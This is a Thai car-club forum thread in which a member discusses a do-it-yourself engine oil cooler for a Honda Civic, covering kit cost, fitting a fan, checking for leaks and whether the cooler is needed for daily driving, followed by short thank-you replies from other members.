โปรเจคนี้ เหมือนลองผิดลองถูกนะครับ เพิ่มโน่นลดนี่ งบเลยบานปลายในเรื่องค่าแรงที่ต้องแก้งานหลายครั้ง และผมมีอุปกรณ์บางส่วนอยู่แล้ว

ถ้าอยากติด ลองดูชุดสำเร็จก็ได้ครับ แบบสายยางธรรมดา ไม่ใช่สายถัก น่าจะประมาณ 3-4พัน ได้ครับ แล้วหาพัดลมมาติดซักตัวประมาณ 500 บาท ก็ใช้งานได้ดีครับ แต่ต้องหมั่น สังเกตเรื่องการรั่วหน่อยนะครับ

อีกข้อหนึ่งเป็นความเห็นส่วนตัวนะครับ oil cooler จะมีประโยชน์ตอนเราขับใช้รอบสูงๆ นานๆ ถ้าขับในชีวิตประจำวันทั่วไป ผมว่าไม่ค่อยจำเป็นเท่าไร ไปเน้นเรื่องการใช้น้ำมันเครื่องเกรดดีๆ ซื้อจากแหล่งที่ไว้ใจได้ เปลี่ยนตามระยะทางที่กำหนด ก็เพียงพอแล้วครับ
ได้รับคำขอบคุณจาก: Wuttikri Boonlert 
neungn11n


ชื่อเล่น: หนึ่ง

เข้าร่วม: 13 กรกฎา 2014
ตอบ: 26

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 7
ให้คำขอบคุณ: 0

ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
ศุกร์, 17 ตุลา 2014 21:13 - DIY Engine Oil Cooler
เยี่ยมมากเลยคับอ่านกระทู้แล้วอยากติดมั้ง
ได้รับคำขอบคุณจาก: riper_zero  Wuttikri Boonlert 
riper_zero


เข้าร่วม: 25 กุมภา 2011
ตอบ: 181

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 228
ให้คำขอบคุณ: 88

ที่อยู่: เมืองทองธานี
ปี: 2002
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
อังคาร, 23 กุมภา 2016 14:05 - DIY Engine Oil Cooler
ไม่ได้เข้ามานาน รูปภาพหมดอายุแล้ว
เดี๋ยวว่างๆผมมาแก้ไขให้ใหม่. นะครับ
ได้รับคำขอบคุณจาก: boom10  Wuttikri Boonlert  musashi44 
boom10


เข้าร่วม: 18 สิงหา 2009
ตอบ: 134

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 115
ให้คำขอบคุณ: 109

ที่อยู่: ลาดกระบัง
ปี: 2005
สี: ทอง แซทเทิลไลท์ (NH-663M)
อังคาร, 7 มิถุนา 2016 12:18 - DIY Engine Oil Cooler
riper_zero พิมพ์ว่า:
ไม่ได้เข้ามานาน รูปภาพหมดอายุแล้ว
เดี๋ยวว่างๆผมมาแก้ไขให้ใหม่. นะครับ




เป็นความรู้ที่เยี่ยมยอดมากเลยครับพี่ เสียดาย รูปหายไปเยอะ ผมนึกว่าพี่ขายรถไปแล้ว ขอบคุณความรู้นะพี่
ได้รับคำขอบคุณจาก: Wuttikri Boonlert 
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.